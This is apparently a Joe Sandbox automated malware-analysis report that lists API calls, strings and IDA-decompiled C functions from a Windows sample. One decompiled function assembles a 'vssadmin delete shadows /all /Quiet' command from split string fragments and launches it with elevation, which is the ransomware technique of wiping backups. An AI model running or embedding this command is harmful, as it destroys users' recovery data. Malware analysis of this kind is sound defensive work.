RegCreateKeyExW.KERNEL32(80000003,\S-1-5-18\Software\xxxsys\,00000000,00000000,00000000,00020019,00000000,00000000,00000000), ref: 0040128A
RegQueryValueExW.ADVAPI32(00000000,004343E0,00000000,?,00441D20,00000008), ref: 004012B2
RegCloseKey.ADVAPI32(00000000), ref: 0040133A
RegCreateKeyExW.KERNEL32(80000001,Software\xxxsys\,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00401372
RegQueryValueExW.KERNEL32(00000000,004343E0,00000000,?,00441D20,00000008), ref: 0040138C
RegSetValueExW.KERNEL32(00000000,004343E0,00000000,00000003,00441D20,00000008), ref: 004013CC
RegFlushKey.ADVAPI32(00000000), ref: 004013D6
RegCloseKey.ADVAPI32(00000000), ref: 0040145A

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

Software\xxxsys\, xrefs: 00401368
AA6A331C729CA1F, xrefs: 004012E1, 00401329, 00401401, 00401449
-F4voH4v~@4v, xrefs: 0040128C
%X%X%X%X, xrefs: 004012DC, 00401313, 004013FC, 00401433
\S-1-5-18\Software\xxxsys\, xrefs: 00401280

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041F9D0, Relevance: 22.6, APIs: 15, Instructions: 110

C-Code - Quality: 100%

			E0041F9D0(long* _a4) {
				long _v8;
				void* _v12;
				long _v16;
				int _t25;
				int _t29;
				void* _t32;
				void* _t58;

				_t58 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				if(_a4 != 0) {
					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) != 0) {
						_t25 = GetTokenInformation(_v12, 0x19, 0, 0,  &_v16); // executed
						if(_t25 != 0 || GetLastError() == 0x7a) {
							_t58 = LocalAlloc(0x40, _v16);
							if(_t58 != 0) {
								_t29 = GetTokenInformation(_v12, 0x19, _t58, _v16,  &_v16); // executed
								if(_t29 != 0) {
									 *_a4 =  *(GetSidSubAuthority( *_t58, 0));
								} else {
									_v8 = GetLastError();
								}
							} else {
								_v8 = GetLastError();
							}
						} else {
							_v8 = GetLastError();
						}
					} else {
						_v8 = GetLastError();
					}
					_t32 = _v12;
					if(_t32 != 0) {
						CloseHandle(_t32);
						_v12 = 0;
					}
					if(_t58 != 0) {
						LocalFree(_t58);
						_v16 = 0;
					}
					if(_v8 == 0) {
						return 1;
					} else {
						SetLastError(_v8);
						return 0;
					}
				} else {
					SetLastError(0x57);
					return 0;
				}
			}

APIs

SetLastError.KERNEL32(00000057,76F85660,?,0041F488,?), ref: 0041F9EF
GetCurrentProcess.KERNEL32(00000008,0041F488,00000000,76F85660,?,0041F488,?), ref: 0041FA03
OpenProcessToken.ADVAPI32(00000000,?,0041F488,?), ref: 0041FA0A
GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA14
GetTokenInformation.KERNELBASE(0041F488,00000019,00000000,00000000,?,7600CD44,?,0041F488,?), ref: 0041FA32
GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA3E
GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA45
LocalAlloc.KERNEL32(00000040,?,?,0041F488,?), ref: 0041FA52
GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA5E
GetTokenInformation.KERNELBASE(0041F488,00000019,00000000,?,?,?,0041F488,?), ref: 0041FA74
GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA7A
GetSidSubAuthority.ADVAPI32(?,00000000,?,0041F488,?), ref: 0041FA86
CloseHandle.KERNEL32(0041F488), ref: 0041FA9E
LocalFree.KERNEL32 ref: 0041FAAC
SetLastError.KERNEL32(?,?,0041F488,?), ref: 0041FABF

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041EA20, Relevance: 21.1, APIs: 3, Strings: 11, Instructions: 118

C-Code - Quality: 73%

			E0041EA20(void* __ebx) {
				signed int _v8;
				char _v263;
				char _v264;
				char _v524;
				char _v528;
				void* _v532;
				intOrPtr _v560;
				char* _v568;
				char* _v572;
				char* _v576;
				intOrPtr _v584;
				char _v588;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr* _t33;
				void* _t47;
				intOrPtr* _t50;
				void* _t55;
				void* _t57;
				void* _t70;
				void* _t72;
				signed int _t77;
				void* _t79;
				void* _t81;
				void* _t82;

				_t57 = __ebx;
				_t75 = _t77;
				_t29 =  *0x43f054; // 0xd6baf341
				_v8 = _t29 ^ _t77;
				_v264 = 0;
				E0042D0A0( &_v263, 0, 0xff);
				_t33 =  *0x48223c;
				_t79 = _t77 - 0x248 + 0xc;
				_v528 = 0;
				if(_t33 != 0) {
					 *_t33( &_v528);
				}
				E00425D48( &_v264, 0x100, "vssa");
				E00425D48( &_v264, 0x100, "dmin");
				E00425D48( &_v264, 0x100, ".exe");
				E0042D0A0( &_v524, 0, 0x104);
				E00425D48( &_v524, 0x104, " delete ");
				E00425D48( &_v524, 0x104, " shadows ");
				E00425D48( &_v524, 0x104, " /all  ");
				E00425D48( &_v524, 0x104, " /Quiet  ");
				E0042D0A0( &_v588, 0, 0x3c);
				_t81 = _t79 + 0x6c;
				_v588 = 0x3c;
				_v576 = "open";
				if( *0x482238 == 0) {
					_v576 = "runas";
				}
				_t69 =  &_v264;
				_v572 =  &_v264;
				_v568 =  &_v524;
				_v560 = 0;
				_v584 = 0x40;
				_t47 = E004204E0( &_v588); // executed
				_t82 = _t81 + 4;
				if(_t47 == 0) {
					_push(_t72);
					_push(_t70);
					while(GetLastError() == 0x4c7) {
						Sleep(0x834);
						_t69 =  &_v588;
						_t55 = E004204E0( &_v588);
						_t82 = _t82 + 4;
						if(_t55 == 0) {
							continue;
						}
						break;
					}
					_pop(_t70);
					_pop(_t72);
				}
				CloseHandle(_v532);
				_t50 =  *0x482240;
				if(_t50 != 0) {
					 *_t50(_v528);
				}
				return E004256FE(0, _t57, _v8 ^ _t75, _t69, _t70, _t72);
			}

APIs

Part of subcall function 004204E0: ShellExecuteEx.SHELL32(?), ref: 004205C8

GetLastError.KERNEL32 ref: 0041EBA5
Sleep.KERNEL32(00000834), ref: 0041EBB3
CloseHandle.KERNEL32(?), ref: 0041EBD1

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

open, xrefs: 0041EB42
@, xrefs: 0041EB81
vssa, xrefs: 0041EA6E
runas, xrefs: 0041EB4E
dmin, xrefs: 0041EA84
<, xrefs: 0041EB38
shadows , xrefs: 0041EAD9
.exe, xrefs: 0041EA9A
delete , xrefs: 0041EAC3
/Quiet , xrefs: 0041EB08
/all , xrefs: 0041EAF2

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042E6D2, Relevance: 19.9, APIs: 9, Strings: 2, Instructions: 610

C-Code - Quality: 87%

			E0042E6D2(signed int* __eax, void* __ebx, void* __edi, void* __esi, signed int _a4, WCHAR* _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				long _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				struct _SECURITY_ATTRIBUTES _v56;
				intOrPtr* _t233;
				void* _t239;
				signed int _t248;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed int _t254;
				void* _t257;
				signed int _t258;
				signed int _t263;
				signed int _t267;
				signed int _t271;
				intOrPtr _t276;
				void* _t281;
				signed int _t284;
				signed int _t291;
				signed int* _t294;
				signed int _t296;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				void* _t305;
				signed int _t308;
				signed int _t311;
				void* _t313;
				signed int _t315;
				void* _t316;
				intOrPtr* _t318;
				signed int _t319;
				signed int _t321;
				signed int _t325;
				void* _t326;
				signed int _t328;
				void* _t329;
				void* _t331;
				intOrPtr* _t332;
				signed int* _t345;
				void* _t349;
				intOrPtr* _t354;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				intOrPtr* _t361;
				void* _t364;
				signed int _t370;
				void* _t373;
				signed char _t378;
				signed int _t413;
				signed int _t423;
				void* _t426;
				void* _t433;
				signed int* _t436;
				signed int _t437;
				void* _t438;
				signed int _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t447;
				intOrPtr _t451;
				intOrPtr _t452;
				void* _t454;
				void* _t456;
				void* _t457;
				void* _t464;

				_t426 = __edi;
				_t454 = _t456;
				_t457 = _t456 - 0x34;
				_push(__ebx);
				_push(__esi);
				_t436 = __eax;
				_v40 = 0;
				_v6 = 0;
				_v12 = 0;
				_v56.nLength = 0xc;
				_v56.lpSecurityDescriptor = 0;
				if((_a12 & 0x00000080) == 0) {
					_v56.bInheritHandle = 1;
					_v5 = 0;
				} else {
					_v56.bInheritHandle = 0;
					_v5 = 0x10;
				}
				if(E00430333( &_v40) != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00427081();
					asm("int3");
					_push(0x14);
					_push(0x43c3a8);
					E00428E80(0, _t426, _t436);
					_v32 = 0;
					_t437 = _a20;
					__eflags = _t437;
					__eflags = 0 | _t437 != 0x00000000;
					if(__eflags != 0) {
						 *_t437 =  *_t437 | 0xffffffff;
						__eflags = _a4;
						__eflags = 0 | _a4 != 0x00000000;
						if(__eflags == 0) {
							goto L145;
						} else {
							__eflags = _a24;
							if(_a24 == 0) {
								L149:
								_v8 = 0;
								_push(_a16);
								_push(_a12);
								_push(_a8);
								_push(_a4);
								_push( &_v32);
								_t239 = E0042E6D2(_t437, 0, 0, _t437); // executed
								_v36 = _t239;
								_v8 = 0xfffffffe;
								E0042EE9D(0, _t437);
								_t235 = _v36;
								__eflags = _v36;
								if(_v36 != 0) {
									 *_t437 =  *_t437 | 0xffffffff;
									__eflags =  *_t437;
								}
							} else {
								asm("sbb eax, eax");
								__eflags =  ~(_a16 & 0xfffffe7f) + 1;
								if(__eflags == 0) {
									goto L145;
								} else {
									goto L149;
								}
							}
						}
					} else {
						L145:
						_t233 = E00427125(__eflags);
						_t438 = 0x16;
						 *_t233 = _t438;
						E004270D3();
						_t235 = _t438;
					}
					return E00428EC5(_t235);
				} else {
					if((_a12 & 0x00008000) == 0 && ((_a12 & 0x00074000) != 0 || _v40 != 0x8000)) {
						_v5 = _v5 | 0x00000080;
					}
					_t248 = _a12 & 0x00000003;
					if(_t248 == 0) {
						_v16 = 0x80000000;
						L17:
						_t373 = 0x10;
						_t250 = _a16 - _t373;
						__eflags = _t250;
						if(_t250 == 0) {
							_v24 = 0;
							goto L27;
						} else {
							_t356 = _t250 - _t373;
							__eflags = _t356;
							if(_t356 == 0) {
								_v24 = 1;
								goto L27;
							} else {
								_t357 = _t356 - _t373;
								__eflags = _t357;
								if(_t357 == 0) {
									_v24 = 2;
									goto L27;
								} else {
									_t358 = _t357 - _t373;
									__eflags = _t358;
									if(_t358 == 0) {
										_v24 = 3;
										goto L27;
									} else {
										_t359 = _t358 - 0x40;
										__eflags = _t359;
										if(__eflags != 0) {
											goto L11;
										} else {
											__eflags = _v16 - 0x80000000;
											_v24 = _t359 & 0xffffff00 | _v16 == 0x80000000;
											L27:
											_t252 = _a12 & 0x00000700;
											_push(_t426);
											__eflags = _t252 - 0x400;
											if(__eflags > 0) {
												__eflags = _t252 - 0x500;
												if(_t252 == 0x500) {
													L43:
													_v28 = 1;
													goto L44;
												} else {
													__eflags = _t252 - 0x600;
													if(_t252 == 0x600) {
														goto L42;
													} else {
														__eflags = _t252 - 0x700;
														if(__eflags == 0) {
															goto L43;
														} else {
															goto L39;
														}
													}
												}
											} else {
												if(__eflags == 0) {
													L35:
													_v28 = 3;
													goto L44;
												} else {
													__eflags = _t252;
													if(_t252 == 0) {
														goto L35;
													} else {
														__eflags = _t252 - 0x100;
														if(_t252 == 0x100) {
															_v28 = 4;
															goto L44;
														} else {
															__eflags = _t252 - 0x200;
															if(_t252 == 0x200) {
																L42:
																_v28 = 5;
																goto L44;
															} else {
																__eflags = _t252 - 0x300;
																if(__eflags != 0) {
																	L39:
																	 *(E00427138(__eflags)) = 0;
																	 *_t436 =  *_t436 | 0xffffffff;
																	__eflags =  *_t436;
																	_t354 = E00427125( *_t436);
																	_t451 = 0x16;
																	 *_t354 = _t451;
																	E004270D3();
																	_t276 = _t451;
																} else {
																	_v28 = 2;
																	L44:
																	_t253 = _a12;
																	_v20 = 0x80;
																	__eflags = 0x00000100 & _t253;
																	if((0x00000100 & _t253) != 0) {
																		_t413 =  *0x4404a4; // 0x0
																		__eflags =  !_t413 & _a20;
																		if(( !_t413 & _a20) >= 0) {
																			_v20 = 1;
																		}
																	}
																	__eflags = _t253 & 0x00000040;
																	if((_t253 & 0x00000040) != 0) {
																		_v20 = _v20 | 0x04000000;
																		_v16 = _v16 | 0x00010000;
																		_t60 =  &_v24;
																		 *_t60 = _v24 | 0x00000004;
																		__eflags =  *_t60;
																	}
																	__eflags = _t253 & 0x00001000;
																	if((_t253 & 0x00001000) != 0) {
																		_t64 =  &_v20;
																		 *_t64 = _v20 | 0x00000100;
																		__eflags =  *_t64;
																	}
																	__eflags = _t253 & 0x00000020;
																	if(__eflags == 0) {
																		__eflags = _t253 & 0x00000010;
																		if(__eflags != 0) {
																			_t72 =  &_v20;
																			 *_t72 = _v20 | 0x10000000;
																			__eflags =  *_t72;
																		}
																	} else {
																		_v20 = _v20 | 0x08000000;
																	}
																	_t254 = E0042F3DD(0, 0x700, 0x100, _t436, __eflags);
																	_t368 = 0xffffffff;
																	 *_t436 = _t254;
																	__eflags = _t254 - 0xffffffff;
																	if(__eflags != 0) {
																		 *_a4 = 1;
																		_t257 = CreateFileW(_a8, _v16, _v24,  &_v56, _v28, _v20, 0); // executed
																		_v36 = _t257;
																		__eflags = _t257 - 0xffffffff;
																		if(_t257 != 0xffffffff) {
																			L64:
																			_t258 = GetFileType(_v36); // executed
																			__eflags = _t258;
																			if(_t258 != 0) {
																				__eflags = _t258 - 2;
																				if(_t258 != 2) {
																					__eflags = _t258 - 3;
																					if(_t258 == 3) {
																						_t108 =  &_v5;
																						 *_t108 = _v5 | 0x00000008;
																						__eflags =  *_t108;
																					}
																				} else {
																					_v5 = _v5 | 0x00000040;
																				}
																				E0042F1A7(_t368,  *_t436, _v36);
																				_t378 = _v5 | 0x00000001;
																				 *( *((intOrPtr*)(0x482280 + ( *_t436 >> 5) * 4)) + (( *_t436 & 0x0000001f) << 6) + 4) = _t378;
																				_t263 =  *_t436;
																				_t423 =  *(0x482280 + (_t263 >> 5) * 4);
																				_t119 = ((_t263 & 0x0000001f) << 6) + 0x24; // 0x24
																				 *(_t423 + _t119) =  *(_t423 + _t119) & 0x00000080;
																				_v7 = _t378;
																				_t121 =  &_v7;
																				 *_t121 = _v7 & 0x00000048;
																				__eflags =  *_t121;
																				_v5 = _t378;
																				if( *_t121 != 0) {
																					L81:
																					__eflags = _v5 & 0x00000080;
																					if((_v5 & 0x00000080) == 0) {
																						goto L134;
																					} else {
																						__eflags = _a12 & 0x00074000;
																						if((_a12 & 0x00074000) == 0) {
																							_t325 = _v40 & 0x00074000;
																							__eflags = _t325;
																							if(_t325 != 0) {
																								_t142 =  &_a12;
																								 *_t142 = _a12 | _t325;
																								__eflags =  *_t142;
																							} else {
																								_a12 = _a12 | 0x00004000;
																							}
																						}
																						_t296 = _a12 & 0x00074000;
																						__eflags = _t296 - 0x4000;
																						if(_t296 == 0x4000) {
																							_v6 = 0;
																						} else {
																							__eflags = _t296 - 0x10000;
																							if(_t296 == 0x10000) {
																								L94:
																								__eflags = (_a12 & 0x00000301) - 0x301;
																								if((_a12 & 0x00000301) == 0x301) {
																									goto L95;
																								}
																							} else {
																								__eflags = _t296 - 0x14000;
																								if(_t296 == 0x14000) {
																									goto L94;
																								} else {
																									__eflags = _t296 - 0x20000;
																									if(_t296 == 0x20000) {
																										L95:
																										_v6 = 2;
																									} else {
																										__eflags = _t296 - 0x24000;
																										if(_t296 == 0x24000) {
																											goto L95;
																										} else {
																											__eflags = _t296 - 0x40000;
																											if(_t296 == 0x40000) {
																												L93:
																												_v6 = 1;
																											} else {
																												__eflags = _t296 - 0x44000;
																												if(_t296 == 0x44000) {
																													goto L93;
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																						__eflags = _a12 & 0x00070000;
																						if((_a12 & 0x00070000) == 0) {
																							goto L134;
																						} else {
																							__eflags = _v5 & 0x00000040;
																							_v32 = 0;
																							if((_v5 & 0x00000040) != 0) {
																								goto L134;
																							} else {
																								_t298 = _v16 & 0xc0000000;
																								__eflags = _t298 - 0x40000000;
																								if(_t298 == 0x40000000) {
																									_t299 = _v28;
																									__eflags = _t299;
																									if(_t299 <= 0) {
																										goto L134;
																									} else {
																										__eflags = _t299 - 2;
																										if(_t299 <= 2) {
																											goto L106;
																										} else {
																											__eflags = _t299 - 4;
																											if(_t299 > 4) {
																												goto L105;
																											} else {
																												_t308 = E0042C6B7(0xc0000000,  *_t436, 0, 0, 2);
																												_t457 = _t457 + 0x10;
																												__eflags = _t308 | _t423;
																												if((_t308 | _t423) == 0) {
																													goto L106;
																												} else {
																													_t311 = E0042C6B7(0xc0000000,  *_t436, 0, 0, 0) & _t423;
																													__eflags = _t311;
																													goto L121;
																												}
																											}
																										}
																									}
																								} else {
																									__eflags = _t298 - 0x80000000;
																									if(_t298 == 0x80000000) {
																										L111:
																										_t313 = E0042FC4C( *_t436,  &_v32, 3);
																										__eflags = _t313 - _t368;
																										if(_t313 == _t368) {
																											goto L76;
																										} else {
																											__eflags = _t313 - 2;
																											if(_t313 == 2) {
																												L123:
																												_t315 = _v32 & 0x0000ffff;
																												__eflags = _t315 - 0xfffe;
																												if(_t315 != 0xfffe) {
																													__eflags = _t315 - 0xfeff;
																													if(_t315 != 0xfeff) {
																														goto L128;
																													} else {
																														_t316 = E00430203( *_t436, 2, 0);
																														__eflags = _t316 - _t368;
																														if(_t316 == _t368) {
																															goto L76;
																														} else {
																															_v6 = 2;
																															goto L134;
																														}
																													}
																												} else {
																													E0042B55D( *_t436);
																													_t318 = E00427125(__eflags);
																													_t443 = 0x16;
																													 *_t318 = _t443;
																													_v12 = _t443;
																												}
																											} else {
																												__eflags = _t313 - 3;
																												if(_t313 != 3) {
																													L128:
																													_t311 = E00430203( *_t436, 0, 0);
																													L121:
																													__eflags = _t311 - _t368;
																													if(_t311 != _t368) {
																														goto L134;
																													} else {
																														goto L76;
																													}
																												} else {
																													__eflags = _v32 - 0xbfbbef;
																													if(_v32 != 0xbfbbef) {
																														goto L123;
																													} else {
																														_v6 = 1;
																														goto L134;
																													}
																												}
																											}
																										}
																									} else {
																										__eflags = _t298 - 0xc0000000;
																										if(_t298 != 0xc0000000) {
																											goto L134;
																										} else {
																											_t299 = _v28;
																											__eflags = _t299;
																											if(_t299 <= 0) {
																												goto L134;
																											} else {
																												__eflags = _t299 - 2;
																												if(_t299 <= 2) {
																													L106:
																													_t433 = 0;
																													_t301 = _v6 - 1;
																													__eflags = _t301;
																													if(__eflags == 0) {
																														_v32 = 0xbfbbef;
																														_push(3);
																														goto L130;
																													} else {
																														__eflags = _t301 - 1;
																														if(__eflags != 0) {
																															goto L134;
																														} else {
																															_v32 = 0xfeff;
																															_push(2);
																															L130:
																															_pop(_t370);
																															while(1) {
																																_push(_t370 - _t433);
																																_push(_t454 + _t433 - 0x1c);
																																_push( *_t436);
																																_t305 = E0042CF23(_t370, _t423, _t433, _t436, __eflags);
																																_t457 = _t457 + 0xc;
																																__eflags = _t305 - 0xffffffff;
																																if(_t305 == 0xffffffff) {
																																	goto L76;
																																}
																																_t433 = _t433 + _t305;
																																__eflags = _t370 - _t433;
																																if(__eflags > 0) {
																																	continue;
																																} else {
																																	_t368 = _t370 | 0xffffffff;
																																	__eflags = _t368;
																																	goto L134;
																																}
																																goto L142;
																															}
																															goto L76;
																														}
																													}
																												} else {
																													__eflags = _t299 - 4;
																													if(_t299 <= 4) {
																														_t319 = E0042C6B7(0xc0000000,  *_t436, 0, 0, 2);
																														_t457 = _t457 + 0x10;
																														__eflags = _t319 | _t423;
																														if((_t319 | _t423) == 0) {
																															goto L106;
																														} else {
																															_t321 = E0042C6B7(0xc0000000,  *_t436, 0, 0, 0);
																															_t457 = _t457 + 0x10;
																															__eflags = (_t321 & _t423) - _t368;
																															if((_t321 & _t423) == _t368) {
																																goto L76;
																															} else {
																																goto L111;
																															}
																														}
																													} else {
																														L105:
																														__eflags = _t299 - 5;
																														if(_t299 != 5) {
																															goto L134;
																														} else {
																															goto L106;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				} else {
																					__eflags = _t378 & 0x00000080;
																					if((_t378 & 0x00000080) == 0) {
																						L134:
																						_t267 =  *_t436;
																						_t173 = ((_t267 & 0x0000001f) << 6) + 0x24; // 0x24
																						 *( *((intOrPtr*)(0x482280 + (_t267 >> 5) * 4)) + _t173) =  *( *((intOrPtr*)(0x482280 + (_t267 >> 5) * 4)) + _t173) ^ ( *( *((intOrPtr*)(0x482280 + (_t267 >> 5) * 4)) + _t173) ^ _v6) & 0x0000007f;
																						_t271 =  *_t436;
																						_t178 = ((_t271 & 0x0000001f) << 6) + 0x24; // 0x48
																						__eflags = _v7;
																						 *( *((intOrPtr*)(0x482280 + (_t271 >> 5) * 4)) + _t178) = _a12 >> 0x00000010 << 0x00000007 |  *( *((intOrPtr*)(0x482280 + (_t271 >> 5) * 4)) + _t178) & 0x0000007f;
																						if(_v7 == 0) {
																							__eflags = _a12 & 0x00000008;
																							if((_a12 & 0x00000008) != 0) {
																								_t291 =  *_t436;
																								_t187 = ((_t291 & 0x0000001f) << 6) + 4; // 0x4c
																								_t294 =  *((intOrPtr*)(0x482280 + (_t291 >> 5) * 4)) + _t187;
																								 *_t294 =  *_t294 | 0x00000020;
																								__eflags =  *_t294;
																							}
																						}
																						__eflags = (_v16 & 0xc0000000) - 0xc0000000;
																						if((_v16 & 0xc0000000) == 0xc0000000) {
																							__eflags = _a12 & 0x00000001;
																							if((_a12 & 0x00000001) != 0) {
																								CloseHandle(_v36);
																								_t281 = CreateFileW(_a8, _v16 & 0x7fffffff, _v24,  &_v56, 3, _v20, 0);
																								__eflags = _t281 - _t368;
																								if(_t281 != _t368) {
																									_t440 =  *_t436;
																									_t442 = (_t440 & 0x0000001f) << 6;
																									__eflags = _t442;
																									 *(_t442 +  *((intOrPtr*)(0x482280 + (_t440 >> 5) * 4))) = _t281;
																								} else {
																									E0042714B(GetLastError());
																									_t284 =  *_t436;
																									_t201 = ((_t284 & 0x0000001f) << 6) + 4; // 0x4
																									 *( *((intOrPtr*)(0x482280 + (_t284 >> 5) * 4)) + _t201) =  *( *((intOrPtr*)(0x482280 + (_t284 >> 5) * 4)) + _t201) & 0x000000fe;
																									E0042F228( *_t436);
																									goto L62;
																								}
																							}
																						}
																					} else {
																						__eflags = _a12 & 0x00000002;
																						if((_a12 & 0x00000002) == 0) {
																							goto L81;
																						} else {
																							_t326 = E00430203( *_t436, _t368, 2);
																							_t434 = _t326;
																							_t457 = _t457 + 0xc;
																							__eflags = _t326 - _t368;
																							if(__eflags != 0) {
																								_v44 = _v44 & 0x00000000;
																								_t328 = E0042FC4C( *_t436,  &_v44, 1);
																								_t464 = _t457 + 0xc;
																								__eflags = _t328;
																								if(_t328 != 0) {
																									L80:
																									_t329 = E00430203( *_t436, 0, 0);
																									_t457 = _t464 + 0xc;
																									__eflags = _t329 - _t368;
																									if(_t329 == _t368) {
																										goto L76;
																									} else {
																										goto L81;
																									}
																								} else {
																									__eflags = _v44 - 0x1a;
																									if(__eflags != 0) {
																										goto L80;
																									} else {
																										asm("cdq");
																										_t331 = E0042FA96(_t378, _t423, __eflags,  *_t436, _t434, _t423);
																										_t464 = _t464 + 0xc;
																										__eflags = _t331 - _t368;
																										if(_t331 == _t368) {
																											goto L76;
																										} else {
																											goto L80;
																										}
																									}
																								}
																							} else {
																								_t332 = E00427138(__eflags);
																								__eflags =  *_t332 - 0x83;
																								if( *_t332 == 0x83) {
																									goto L81;
																								} else {
																									L76:
																									E0042B55D( *_t436);
																									goto L62;
																								}
																							}
																						}
																					}
																				}
																			} else {
																				 *( *((intOrPtr*)(0x482280 + ( *_t436 >> 5) * 4)) + (( *_t436 & 0x0000001f) << 6) + 4) =  *( *((intOrPtr*)(0x482280 + ( *_t436 >> 5) * 4)) + (( *_t436 & 0x0000001f) << 6) + 4) & 0x000000fe;
																				_t447 = GetLastError();
																				E0042714B(_t447);
																				CloseHandle(_v36);
																				__eflags = _t447;
																				if(__eflags == 0) {
																					 *((intOrPtr*)(E00427125(__eflags))) = 0xd;
																				}
																				goto L63;
																			}
																		} else {
																			__eflags = (_v16 & 0xc0000000) - 0xc0000000;
																			if((_v16 & 0xc0000000) != 0xc0000000) {
																				L61:
																				_t345 =  *((intOrPtr*)(0x482280 + ( *_t436 >> 5) * 4)) + (( *_t436 & 0x0000001f) << 6) + 4;
																				 *_t345 =  *_t345 & 0x000000fe;
																				__eflags =  *_t345;
																				E0042714B(GetLastError());
																				L62:
																				L63:
																				_v12 =  *((intOrPtr*)(E00427125(__eflags)));
																			} else {
																				__eflags = _a12 & 0x00000001;
																				if((_a12 & 0x00000001) == 0) {
																					goto L61;
																				} else {
																					_v16 = _v16 & 0x7fffffff;
																					_t349 = CreateFileW(_a8, _v16, _v24,  &_v56, _v28, _v20, 0);
																					_v36 = _t349;
																					__eflags = _t349 - 0xffffffff;
																					if(_t349 != 0xffffffff) {
																						goto L64;
																					} else {
																						goto L61;
																					}
																				}
																			}
																		}
																		L142:
																		_t276 = _v12;
																	} else {
																		 *(E00427138(__eflags)) =  *_t350 & 0x00000000;
																		 *_t436 = 0xffffffff;
																		 *((intOrPtr*)(E00427125(__eflags))) = 0x18;
																		_t276 =  *((intOrPtr*)(E00427125(__eflags)));
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t364 = _t248 - 1;
						if(_t364 == 0) {
							__eflags = _a12 & 0x00000008;
							if((_a12 & 0x00000008) == 0) {
								L15:
								_v16 = 0x40000000;
							} else {
								__eflags = _a12 & 0x00070000;
								if((_a12 & 0x00070000) != 0) {
									goto L12;
								} else {
									goto L15;
								}
							}
							goto L17;
						} else {
							_t473 = _t364 == 1;
							if(_t364 == 1) {
								L12:
								_v16 = 0xc0000000;
								goto L17;
							} else {
								L11:
								 *((intOrPtr*)(E00427138(_t473))) = 0;
								 *_t436 =  *_t436 | 0xffffffff;
								_t361 = E00427125(_t473);
								_t452 = 0x16;
								 *_t361 = _t452;
								E004270D3();
								_t276 = _t452;
							}
						}
					}
					return _t276;
				}
			}

0x0042e6d2
0x0042e6d5
0x0042e6d7
0x0042e6da
0x0042e6e1
0x0042e6e2
0x0042e6e4
0x0042e6e7
0x0042e6ea
0x0042e6ed
0x0042e6f4
0x0042e6f7
0x0042e702
0x0042e709
0x0042e6f9
0x0042e6f9
0x0042e6fc
0x0042e6fc
0x0042e718
0x0042edfc
0x0042edfd
0x0042edfe
0x0042edff
0x0042ee00
0x0042ee01
0x0042ee06
0x0042ee07
0x0042ee09
0x0042ee0e
0x0042ee15
0x0042ee1a
0x0042ee1d
0x0042ee22
0x0042ee24
0x0042ee39
0x0042ee3e
0x0042ee44
0x0042ee46
0x00000000
0x0042ee48
0x0042ee48
0x0042ee4b
0x0042ee5c
0x0042ee5c
0x0042ee5f
0x0042ee62
0x0042ee65
0x0042ee68
0x0042ee6e
0x0042ee71
0x0042ee79
0x0042ee7c
0x0042ee83
0x0042ee88
0x0042ee8b
0x0042ee8d
0x0042ee8f
0x0042ee8f
0x0042ee8f
0x0042ee4d
0x0042ee57
0x0042ee59
0x0042ee5a
0x00000000
0x00000000
0x00000000
0x00000000
0x0042ee5a
0x0042ee4b
0x0042ee26
0x0042ee26
0x0042ee26
0x0042ee2d
0x0042ee2e
0x0042ee30
0x0042ee35
0x0042ee35
0x0042ee97
0x0042e71e
0x0042e726
0x0042e736
0x0042e736
0x0042e740
0x0042e74c
0x0042e791
0x0042e794
0x0042e799
0x0042e79a
0x0042e79a
0x0042e79c
0x0042e7d5
0x00000000
0x0042e79e
0x0042e79e
0x0042e79e
0x0042e7a0
0x0042e7cc
0x00000000
0x0042e7a2
0x0042e7a2
0x0042e7a2
0x0042e7a4
0x0042e7c3
0x00000000
0x0042e7a6
0x0042e7a6
0x0042e7a6
0x0042e7a8
0x0042e7ba
0x00000000
0x0042e7aa
0x0042e7aa
0x0042e7aa
0x0042e7ad
0x00000000
0x0042e7af
0x0042e7af
0x0042e7b5
0x0042e7d8
0x0042e7e0
